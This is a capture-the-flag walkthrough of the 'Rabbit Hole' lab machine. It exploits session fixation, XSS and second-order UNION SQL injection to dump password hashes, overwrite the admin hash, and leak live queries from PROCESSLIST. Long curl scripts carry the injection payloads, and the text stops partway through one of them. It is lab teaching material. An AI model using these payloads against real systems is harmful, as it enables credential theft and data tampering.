# Rabbit Hole {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We start with a Nmap scan and find two open ports. Port 22 with SSH and port 80 with an `Apache httpd 2.4.59` web server.

Next, we continue with a directory scan on the web server. However, we do not find any other directories or pages that we could find manually too.

The index page welcomes us with a recruitment campaign. We can either log in or register beforehand and then log in. Furthermore, it is pointed out that an anti-bruteforce measure is active and activities are monitored.

On the registration page, we find the same note. We first create a new user and log in.

On the login page, on the other hand, the notice is slightly modified and reveals that the anti bruteforce measure is implemented using database queries. The login takes some time. So the measure might be just a randomized `sleep`.

## Session Fixation After logging in and out again, we notice that the session cookie remains the same. Furthermore, we can name this cookie as we wish. For example, after logging in with the cookie `0xb0b` as the value, this is becomes the valid session name. This is a vulnerbaility where we could forces a target to use a specific session ID, allowing us to hijack the targets’s session once they log in. This can happen if the application doesn't create a new session ID upon login, leaving the initial session ID vulnerable. Or we could control multiple sessions. We'll keep this in mind for now and continue.

## XSS Furthermore, we notice that our username is reflected.

We now use an xss payload as the name and see how this is evaluated.

After we have logged in with the user, we see our alert. It works.

{% hint style="info" %} At that time, a lot of cookie stealing via xss was tried. But despite the fact that you could A lot of cookie stealing via XSS was attempted at the time. But despite the fact that you could see logins from the admin (in the timestamp list), no payload was triggered. And this is where serendipity came into play when trying out ChatGPT payloads. {% endhint %} We create a user with the following payload and find the following error after logging in. We migh have SQL Injection (second order) via the username. Second-order SQL injection involves injecting malicious SQL code that is stored in the database. The attack executes later when the application processes this stored data in another operation. ```javascript ```

## SQL injection (second order) Below you will always find the payload (i.e. username) and the corresponding response as a screenshot. First, a user must always be registered with the payload as the name and then logged in. ### Databasse enumeration First of all, we check how many columns our current table has. We can guess two from the table with user id and timestamp, but we check anyway. ```sql /" UNION SELECT 1 -- - ```

```sql /" UNION SELECT 1,2 -- - ```

So we have two columns, we now enumerate the database using union SQL injection with the help pf the`INFORMATION_SCHEMA` database. We have the table `users`and `logins` present in the current database. {% code overflow="wrap" %} ```sql /" UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=DATABASE() -- ``` {% endcode %}

Next, we try to dump the users table. However, we realize that the output is limited to 16 characters. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'-- - ``` {% endcode %}

We use `SUBSTRING` to retrieve the 16 character blocks step by step from the initial output. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 1, 16)-- - ``` {% endcode %}

With the second user, we retrieve the next 16 characters. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 17, 16)-- - ``` {% endcode %}

So the `users` table consists of `id,username,password,group`. ### Password Dump Now we want to dump the admin password. It seems to be a MD5 hash. Using hashcat we are unable to crack it using `rockyou.txt`. We could also try something like , but it's not cracked there either. {% code overflow="wrap" %} ``` /" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 1, 16) -- - ``` {% endcode %} {% code overflow="wrap" %} ``` /" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 17, 16) -- - ``` {% endcode %}

### User Enumeration Besides `admin`, there are other users present, `foo` and `bar`. ```sql /" UNION SELECT 1,`username` FROM users -- - ```

We repeat the steps from before for the users `foo` and `bar` to dump their password hashes. The following is only the payload for user `foo`. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='foo'), 1, 16) -- - ``` {% endcode %} {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='foo'), 17, 16) -- - ``` {% endcode %} We are able to crack both hashes, which confirms we are dealing with an MD5 hash. But they are telling us it's a rabbithole.

Another idea is to set the `group` of a user to `admin` or change the password hash of the `admin` user to a one we desire. But after logging in with our set hash for `admin`, that index page stays the same and does not reveal anything new to us. {% code overflow="wrap" %} ```sql \" UNION SELECT 1,2; UPDATE users SET password = 'edfc58e50c421e52d25527a737c249da' WHERE username = 'admin'; ``` {% endcode %} ### Processlist We can still see that the `admin` is logging in every minute. So the queries is also triggered and possibly logged.

With a bit of research, we find that `INFORMATION_SCHEMA` has the table `PROCESSLIST`. The [Information Schema](https://mariadb.com/kb/en/information_schema/) `PROCESSLIST` table contains information about running threads. {% embed url="" %} The column `INFO` might hold the treasure we are seeking. Since it contains the statement, the thread is executing. With our assumption from earlier that the anti-brute-force measurement is just a sleep, we might have a chance to leak it because the queries stay there while they are executed.

We query for the `COMMAND` column and see that the current process is running a query. ```sql /" UNION SELECT 1,COMMAND FROM information_schema.PROCESSLIST -- - ```

Next, we try to dump the `INFO` column, and see part of a query. Nice. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(INFO) FROM information_schema.PROCESSLIST), 1, 16) -- - ``` {% endcode %}

By reloading the page several times, we can see, with a bit of luck, a different query: ``` SELECT * from us ``` This might be the `admin` logging in. Furthermore, we can observe that several queries are running simultaneously while we are logging in. After execution finishes, however, this is no longer included in the table. {% code overflow="wrap" %} ```sql /" UNION SELECT 1,SUBSTRING((SELECT group_concat(ID) FROM information_schema.PROCESSLIST), 1, 16) -- - ``` {% endcode %}

By dumping the table, we always create new queries. However, only the oldest one is of interest, i.e., the one to which the `admin` logs in. Therefore, we now query for the smallest ID. With a bit of timing, we are able to see a different response, as already mentioned. {% code overflow="wrap" %} ```sql \" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- - ``` {% endcode %} We do this in the same way as with the password dump, with a separate user for each 16-character block. Which means that we have to create some users. Furthermore, the retrieval of the information has to happen quicklicky, before the query vanishes. Fortunately, we have session fixation and can assign a session for each registered user on login. But more on that in a moment, first we register the users. We can do this laboriously in Burp Suite, as shown below. This is just an example. Using the password, like the username. The following scripts use a much simpler password for readability.

Alternatively, we could use Burp Suite to create the curl request and then adapt the `SUBSTRING` Parameter to create different users, targeting different blocks: {% code title="register.sh" overflow="wrap" lineNumbers="true" %} ```bash #!/bin/bash curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 17, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 33, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 49, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 65, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 81, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 97, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 113, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 129, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 145, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 161, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 177, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 193, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 209, 16) -- -&password=asdf&submit=Submit+Query' \ $'http://rabbithole.thm/register.php' ``` {% endcode %} Next, we run the register script to register the users.

Now we need to log in with the users. We could use Burp Suite again, where we need to edit the `PHPSESSID` value and the `SUBSTRING` Parameter. For each user, we need a different session `ID`.

This could also be done using the following script: {% code title="login.sh" overflow="wrap" lineNumbers="true" %} ```bash #!/bin/bash curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 197' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=1' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=2' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 17, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=3' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 33, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=4' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 49, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=5' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 65, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=6' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 81, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=7' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 97, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=8' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 113, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=9' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 129, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=10' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 145, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=11' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 161, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' 